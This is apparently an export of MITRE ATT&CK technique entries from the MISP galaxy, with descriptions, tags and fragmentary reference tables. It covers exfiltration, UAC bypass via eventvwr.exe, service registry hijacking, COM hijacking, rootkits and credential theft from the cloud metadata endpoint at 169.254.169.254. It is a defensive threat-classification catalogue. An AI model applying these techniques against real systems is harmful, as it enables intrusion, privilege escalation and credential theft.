The tag is: misp-galaxy:mitre-attack-pattern="Obtain Device Cloud Backups - T1470"

Table 3099. Table References

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Exfiltration Over Alternative Protocol - T1048

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the
main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016)

The tag is: *misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"

**Table 3100. Table References**

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**Access Stored Application Data - T1409**

Adversaries may access and collect application data resident on the device. Adversaries often target popular applications such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019)

This technique requires either escalated privileges or for the targeted app to have stored the data in an insecure manner (e.g., with insecure file permissions or in an insecure location such as an external storage directory).

The tag is: *misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409"

**Table 3101. Table References**

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<td><a href="https://securitywithoutborders.org/blog/2019/03/29/exodus.html">https://securitywithoutborders.org/blog/2019/03/29/exodus.html</a></td>
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**System Network Connections Discovery - T1049**

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are
connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)

Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), “net use,” and “net session” with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and `lsof` can be used to list current connections. `<code>who -a</code>` and `<code>w</code>` can be used to show which users are currently logged in, similar to "net session".

The tag is: `misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049"

### Table 3102. Table References

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**Use Alternate Authentication Material - T1550**

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.

The tag is: `misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550"`
Service Registry Permissions Weakness - T1058

Windows stores local service configuration information in the Registry under `<code>HKLM\SYSTEM\CurrentControlSet\Services</code>`. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, `sc.exe`, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter Registry keys associated with service failure parameters (such as `<code>FailureCommand</code>`) that may be executed in an elevated context anytime the service fails or is intentionally corrupted. (Citation: TrustedSignal Service Failure) (Citation: Twitter Service Recovery Nov 2017)

The tag is: `misp-galaxy:mitre-attack-pattern="Service Registry Permissions Weakness - T1058"

Service Registry Permissions Weakness - T1058 has relationships with:


Table 3104. Table References

Links

- [https://attack.mitre.org/techniques/T1058](https://attack.mitre.org/techniques/T1058)
- [https://capec.mitre.org/data/definitions/478.html](https://capec.mitre.org/data/definitions/478.html)
- [https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx](https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx)
- [https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html](https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html)
- [https://twitter.com/r0wdy_/status/936365549553991680](https://twitter.com/r0wdy_/status/936365549553991680)
Command and Scripting Interpreter - T1059

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.

The tag is: **misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"**

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Gather Victim Network Information - T1590

Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: **misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590"**
Indicator Removal from Tools - T1066

If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.

The tag is: `misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1066"

Indicator Removal from Tools - T1066 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005"` with estimative-language:likelihood-probability="almost-certain"

Exploitation for Privilege Escalation - T1068

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been...
properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD). (Citation: ESET InvisiMole June 2020) (Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).

The tag is: *misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"

**Table 3108. Table References**

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**Bypass User Account Control - T1088**

Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.

Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

- `<code>eventvwr.exe</code>` can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)
Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088"

Bypass User Account Control - T1088 has relationships with:


**Table 3109. Table References**

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**Exploitation for Defense Evasion - T1211**

Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.

Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211"
Links

https://attack.mitre.org/techniques/T1211

Extra Window Memory Injection - T1181

Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may take place in the address space of a separate live process. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Endgame Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181"

Extra Window Memory Injection - T1181 has relationships with:


Table 3111. Table References

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1312
Exploitation for Credential Access - T1212

Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions. (Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.

The tag is: `misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212"`

Table 3112. Table References

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Component Object Model Hijacking - T1122

The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

The tag is: `misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1122"`

Component Object Model Hijacking - T1122 has relationships with:

Data from Information Repositories - T1213

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.

The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:

- Policies, procedures, and standards
- Physical / logical network diagrams
- System architecture diagrams
- Technical system documentation
- Testing / development credentials
- Work / project schedules
- Source code snippets
- Links to network shares and other internal resources

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.

The tag is: `misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213"`

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System Network Connections Discovery - T1421

On Android, applications can use standard APIs to gather a list of network connections to and from
the device. For example, the Network Connections app available in the Google Play Store (Citation: ConnMonitor) advertises this functionality.

The tag is: *misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1421"

### Kernel Modules and Extensions - T1215

Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)

Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)

Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through `<code>kextload</code>` and `<code>kextunload</code>` commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)

The tag is: *misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215"

Kernel Modules and Extensions - T1215 has relationships with:


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Build Image on Host - T1612

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote `<code>build</code>` request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)

An adversary may take advantage of that `<code>build</code>` API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it's a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

The tag is: `misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612"

Table 3117. Table References

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Network Share Connection Removal - T1126

Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the `<code>net use \system\share /delete</code>` command. (Citation: Technet Net Use)

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
Network Share Connection Removal - T1126 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

**Signed Script Proxy Execution - T1216**

Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)

The tag is: *misp-galaxy:mitre-attack-pattern="Signed Script Proxy Execution - T1216"*

**Signed Binary Proxy Execution - T1218**

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.

The tag is: *misp-galaxy:mitre-attack-pattern="Signed Binary Proxy Execution - T1218"*

**Build social network persona - T1341**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1341).
For attacks incorporating social engineering the utilization of an on-line persona is important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (Facebook, LinkedIn, Twitter, Google+, etc.). (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

The tag is: misp-galaxy:mitre-attack-pattern="Build social network persona - T1341"

Table 3121. Table References

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**Remote access tool development - T1351**

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1351).

A remote access tool (RAT) is a piece of software that allows a remote user to control a system as if they had physical access to that system. An adversary may utilize existing RATs, modify existing RATs, or create their own RAT. (Citation: ActiveMalwareEnergy)

The tag is: misp-galaxy:mitre-attack-pattern="Remote access tool development - T1351"

Table 3122. Table References

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<td><a href="https://attack.mitre.org/techniques/T1351">https://attack.mitre.org/techniques/T1351</a></td>
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<td><a href="https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/">https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/</a></td>
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**Container and Resource Discovery - T1613**

Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs. (Citation: Docker API) (Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment's configuration, which services are available, and what cloud provider the victim may be utilizing.
The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

The tag is: `misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613"`

**Table 3123. Table References**

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<td><a href="https://docs.docker.com/engine/api/v1.41/">https://docs.docker.com/engine/api/v1.41/</a></td>
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<td><a href="https://kubernetes.io/docs/concepts/overview/kubernetes-api/">https://kubernetes.io/docs/concepts/overview/kubernetes-api/</a></td>
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**Secure and protect infrastructure - T1317**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1317).

An adversary may secure and protect their infrastructure just as defenders do. This could include the use of VPNs, security software, logging and monitoring, passwords, or other defensive measures. (Citation: KrebsTerracottaVPN)

The tag is: `misp-galaxy:mitre-attack-pattern="Secure and protect infrastructure - T1317"`

**Table 3124. Table References**

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**Obfuscate or encrypt code - T1319**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1319).

Obfuscation is the act of creating code that is more difficult to understand. Encoding transforms the code using a publicly available format. Encryption transforms the code such that it requires a key to reverse the encryption. (Citation: CylanceOpCleaver)

The tag is: `misp-galaxy:mitre-attack-pattern="Obfuscate or encrypt code - T1319"`

**Table 3125. Table References**

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<td><a href="https://attack.mitre.org/techniques/T1319">https://attack.mitre.org/techniques/T1319</a></td>
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</table>
Elevated Execution with Prompt - T1514

Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials. The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms. This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code. This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.

The tag is: `misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1514"`

Elevated Execution with Prompt - T1514 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1548.004"` with estimative-language:likelihood-probability="almost-certain"

Table 3126. Table References

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Data Encrypted for Impact - T1471

An adversary may encrypt files stored on the mobile device to prevent the user from accessing them, for example with the intent of only unlocking access to the files after a ransom is paid. Without escalated privileges, the adversary is generally limited to only encrypting files in external/shared storage locations. This technique has been demonstrated on Android. We are unaware of any demonstrated use on iOS.

The tag is: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1471"`
**Man in the Browser - T1185**

Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)

Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)

The tag is: `misp-galaxy:mitre-attack-pattern="Man in the Browser - T1185"`

**Hidden Files and Directories - T1158**

To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with
command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).

Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

**Windows**

Users can mark specific files as hidden by using the attrib.exe binary. Simply do <code>attrib +h filename</code> to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.

**Linux/Mac**

Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: <code>defaults write com.apple.finder AppleShowAllFiles YES</code>, and then relaunch the Finder Application.

**Mac**

Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1158"

Hidden Files and Directories - T1158 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

**Table 3129. Table References**

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Gather Victim Org Information - T1591

Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Org Information - T1591"

Table 3130. Table References

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System Network Configuration Discovery - T1422

On Android, details of onboard network interfaces are accessible to apps through the java.net.NetworkInterface class.(Citation: NetworkInterface) The Android TelephonyManager class can be used to gather related information such as the IMSI, IMEI, and phone number.(Citation: TelephonyManager)

On iOS, gathering network configuration information is not possible without root access.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422"

Table 3131. Table References

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1323
Cloud Instance Metadata API - T1522

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance. (Citation: AWS Instance Metadata API)

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API. (Citation: RedLock Instance Metadata API 2018)

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http://169.254.169.254</code>.

The tag is: <code>misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1522"</code>

Cloud Instance Metadata API - T1522 has relationships with:

- revoked-by: <code>misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005" with estimative-language:likelihood-probability="almost-certain"

### Identify analyst level gaps - T1233

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1233).

Analysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)
Generate analyst intelligence requirements - T1234

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1234).

Analysts may receive Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from leadership or key decision makers and generate intelligence requirements to articulate intricacies of information required on a topic or question. (Citation: Herring1999)

The tag is: *misp-galaxy:mitre-attack-pattern*="Generate analyst intelligence requirements - T1234"

Identify security defensive capabilities - T1263

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1263).

Security defensive capabilities are designed to stop or limit unauthorized network traffic or other types of accesses. (Citation: OSFingerprinting2014) (Citation: NMAP WAF NSE)

The tag is: *misp-galaxy:mitre-attack-pattern*="Identify security defensive capabilities - T1263"

Use multiple DNS infrastructures - T1327

